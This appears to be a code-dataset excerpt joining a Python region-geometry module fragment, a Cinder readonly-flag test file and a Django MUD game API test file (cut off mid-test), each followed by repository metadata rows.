s1, la1, lb1 = [ list(z) for z in zip(* hsegs1 )]
s2, la2, lb2 = [ list(z) for z in zip(* hsegs2 )]
# keep the ones out of the opposing region
resultSet = set();
resultSet |= segLibrary.keepOuterBoundary( s1, la1, lb1, s2, la2, lb2, False )
resultSet |= segLibrary.keepInnerBoundary( s2, la2, lb2, s1, la1, lb1, False )
# make a region out of it
resultList = list( resultSet )
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
else:
return hsegs1
def intersection( hsegs1, hsegs2 ):
''' Assumes that hsegs1 and hsegs2 are valid regions, created with def createRegionFromSegs.
regions are assumed to have valid labelling. This function will relabel them to compute the intersction
'''
# check for empty input
if hsegs2 == None or len(hsegs2) == 0:
return list()
if hsegs1 == None or len( hsegs1) == 0:
return list()
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# get the bboxs
s1maxx = max( [x[0] for y in segs1 for x in y] )
s1minx = min( [x[0] for y in segs1 for x in y] )
s1maxy = max( [x[1] for y in segs1 for x in y] )
s1miny = min( [x[1] for y in segs1 for x in y] )
s2maxx = max( [x[0] for y in segs2 for x in y] )
s2minx = min( [x[0] for y in segs2 for x in y] )
s2maxy = max( [x[1] for y in segs2 for x in y] )
s2miny = min( [x[1] for y in segs2 for x in y] )
# check for overlap in x AND y direction
if (s1maxx >= s2maxx and s1minx >= s2maxx) or ( s1maxx <= s2minx and s1minx <= s2minx) or (s1maxy >= s2maxy and s1miny >= s2maxy) or ( s1maxy <= s2miny and s1miny <= s2miny):
return list()
# get the broken segs
resultSegs1, resultSegs2 = segLibrary.segIntersection( segs1, segs2 )
# get the regions
hsegs1 = hsegLibrary.labelUniqueCycles( resultSegs1 )
hsegs1 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs1 )
hsegs2 = hsegLibrary.labelUniqueCycles( resultSegs2 )
hsegs2 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs2 )
# keep just the left hsegs
hsegs1 = [h for h in hsegs1 if hsegLibrary.isLeft( h ) ]
hsegs2 = [h for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# union will keep all hsegs out of the other or on with matching interabove
s1, la1, lb1 = [ list(z) for z in zip(* hsegs1 )]
s2, la2, lb2 = [ list(z) for z in zip(* hsegs2 )]
# keep the ones out of the opposing region
resultSet = set();
resultSet |= segLibrary.keepInnerBoundary( s1, la1, lb1, s2, la2, lb2 )
resultSet |= segLibrary.keepInnerBoundary( s2, la2, lb2, s1, la1, lb1 )
# make a region out of it
resultList = list( resultSet )
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def writeRegionToFile( theRegion, theFileName ):
theFileObject = open( theFileName, 'w')
for h in theRegion:
if hsegLibrary.isLeft( h ) or h[0][0] == h[0][1]:
s1 = str( h[0][0][0])+' '+str(h[0][0][1])+' '+str( h[0][1][0])+' '+str(h[0][1][1])+' '+ str(h[1])+' '+ str(h[2]) +' ' + '\n'
theFileObject.write( s1 )
theFileObject.close()
def writeRegionToHexFile( theRegion, theFileName ):
theFileObject = open( theFileName, 'w')
for h in theRegion:
if hsegLibrary.isLeft( h ) or h[0][0] == h[0][1]:
x1 = struct.pack('>d', h[0][0][0])
hexx1 = ''.join('%.2x' % ord(c) for c in x1)
y1 = struct.pack('>d', h[0][0][1])
hexy1 = ''.join('%.2x' % ord(c) for c in y1)
x2 = struct.pack('>d', h[0][1][0])
hexx2 = ''.join('%.2x' % ord(c) for c in x2)
y2 = struct.pack('>d', h[0][1][1])
hexy2 = ''.join('%.2x' % ord(c) for c in y2)
s1 = hexx1 + ' ' + hexy1 + ' ' + hexx2 + ' ' + hexy2 + ' ' + str(h[1]) + ' ' + str(h[2]) + ' ' + '\n'
theFileObject.write( s1 )
theFileObject.close()
| 42.019178 | 223 | 0.682989 | 2,204 | 15,337 | 4.751815 | 0.128857 | 0.009166 | 0.01375 | 0.016041 | 0.823546 | 0.807887 | 0.782679 | 0.782679 | 0.760623 | 0.736274 | 0 | 0.035923 | 0.20682 | 15,337 | 364 | 224 | 42.134615 | 0.82499 | 0.105366 | 0 | 0.651982 | 1 | 0 | 0.011956 | 0.003295 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.013216 | null | null | 0.008811 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
93720a28d09163970f141c5e450e582ffd8f1ae9 | 3,322 | py | Python | Lib/test/test_compiler/test_readonly/test_attr_access.py | itamaro/cinder | a08198c185a255b59f85dc84183558370a0c5284 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/test/test_compiler/test_readonly/test_attr_access.py | itamaro/cinder | a08198c185a255b59f85dc84183558370a0c5284 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/test/test_compiler/test_readonly/test_attr_access.py | itamaro/cinder | a08198c185a255b59f85dc84183558370a0c5284 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | import unittest
from .common import ReadonlyTestBase
class AttrAccessTests(ReadonlyTestBase):
def test_readonly_flags0(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls: Readonly[object], t):
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 0)
def test_readonly_flags1(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls, t):
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 1)
def test_readonly_flags2(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls: Readonly[object], t) -> Readonly[object]:
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 2)
def test_readonly_flags3(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls, t) -> Readonly[object]:
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 3)
def test_readonly_flags_no_readonly(self) -> None:
code = """
class Descr:
def __get__(self, cls, t):
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 1)
def test_readonly_flags_inheritance(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls, t):
pass
class NewClass:
a = Descr()
class DerivedClass(NewClass):
pass
def f():
return DerivedClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 1)
def test_readonly_flags_multiple_inheritance(self) -> None:
code = """
class Descr1:
@readonly_func
def __get__(self, cls, t):
pass
class NewClass1:
a = Descr1()
class Descr2:
@readonly_func
def __get__(self, cls: Readonly[object], t) -> Readonly[object]:
pass
class NewClass2:
a = Descr2()
class DerivedClass(NewClass1, NewClass2):
pass
def f():
return DerivedClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 3)
def _compile_and_run(self, code: str, func: str) -> None:
f = self.compile_and_run(code)[func]
return f()
| 23.394366 | 76 | 0.509031 | 332 | 3,322 | 4.756024 | 0.144578 | 0.056998 | 0.074098 | 0.065864 | 0.782141 | 0.730209 | 0.730209 | 0.730209 | 0.730209 | 0.708043 | 0 | 0.016312 | 0.39103 | 3,322 | 141 | 77 | 23.560284 | 0.764212 | 0 | 0 | 0.764151 | 0 | 0 | 0.58519 | 0.027092 | 0 | 0 | 0.006321 | 0 | 0.066038 | 1 | 0.075472 | false | 0.09434 | 0.018868 | 0 | 0.179245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
faa7bcad82cabd67bccd12c2874b28c1353ad264 | 45,701 | py | Python | lively-lions/MUD/dungeon/test/view/test_character.py | whywhyy/summer-code-jam-2020 | 9d46c6a9e6ccfae1b9ab5db1b6bf2a6b0abe4c10 | [
"MIT"
] | 2 | 2020-08-03T09:38:05.000Z | 2020-08-04T03:52:26.000Z | lively-lions/MUD/dungeon/test/view/test_character.py | whywhyy/summer-code-jam-2020 | 9d46c6a9e6ccfae1b9ab5db1b6bf2a6b0abe4c10 | [
"MIT"
] | null | null | null | lively-lions/MUD/dungeon/test/view/test_character.py | whywhyy/summer-code-jam-2020 | 9d46c6a9e6ccfae1b9ab5db1b6bf2a6b0abe4c10 | [
"MIT"
] | null | null | null | # from django.contrib.auth.models import User
# from django.test import TestCase
from django.test import Client
# from django.urls import reverse
import pytest
# from mixer.backend.django import mixer
from .test_base import BaseTestCase
from dungeon.models.character import MudUser, Character
@pytest.mark.django_db
class CharacterTestCase(BaseTestCase):
def test_base_create_user_and_login(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
def test_and_create_character(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
def test_and_create_two_samename_character(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create samename character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
def test_and_create_character_get_character_list(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# get character
insert_data = {'view_name': 'get_character_list'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name'.encode(), 'Should be same'
def test_and_not_character_get_character_list(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# get character
insert_data = {'view_name': 'get_character_list'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
def test_and_create_two_character_get_character_list(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# get character
insert_data = {'view_name': 'get_character_list'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name02'.encode(), 'Should be same'
def test_and_create_character_and_get_character_stats(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# get character stats
insert_data = {'view_name': 'get_character_stats', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == \
'hello_name01 hp : 100/100 total attack : 11 attack cool time : 3.0 total defense : 11'.encode(), \
'Should be same'
def test_and_create_character_and_update_character_stats_and_get_stats(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# update character stats # hp | max_hp | total_attack | total_defense # only UP
# max_hp
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'max_hp', 'num': '1', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success max_hp changed'.encode(), 'Should be same'
# hp
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'hp', 'num': '1', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success hp changed'.encode(), 'Should be same'
# total_attack
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'total_attack',
'num': '2', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success total attack changed'.encode(), 'Should be same'
# total_defense
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'total_defense',
'num': '3', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success total defense changed'.encode(), 'Should be same'
# get character stats
insert_data = {'view_name': 'get_character_stats', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == \
'hello_name01 hp : 101/101 total attack : 13 attack cool time : 3.0 total defense : 14'.encode(), \
'Should be same'
# total_cool_time
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'attack_cool_time',
'num': '-0.2', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success attack cool time changed'.encode(), 'Should be same'
# get character stats
insert_data = {'view_name': 'get_character_stats', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == \
'hello_name01 hp : 101/101 total attack : 13 attack cool time : 2.8 total defense : 14'.encode(), \
'Should be same'
def test_and_select_character(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# select character
insert_data = {'view_name': 'select_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
def test_logout_check_now_connected_character_name(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# select second character
insert_data = {'view_name': 'select_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
insert_data = {'view_name': 'logout_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Logout success', 'Should be same'
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == '', 'Should be same'
def test_select_character_and_get_user_list_in_samelocation(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
def test_select_character_and_get_two_user_list_in_samelocation(self):
client = Client()
# USer 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
def test_two_character_in_same_room_and_attack_user1_to_user2(self):
client = Client()
# USer 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
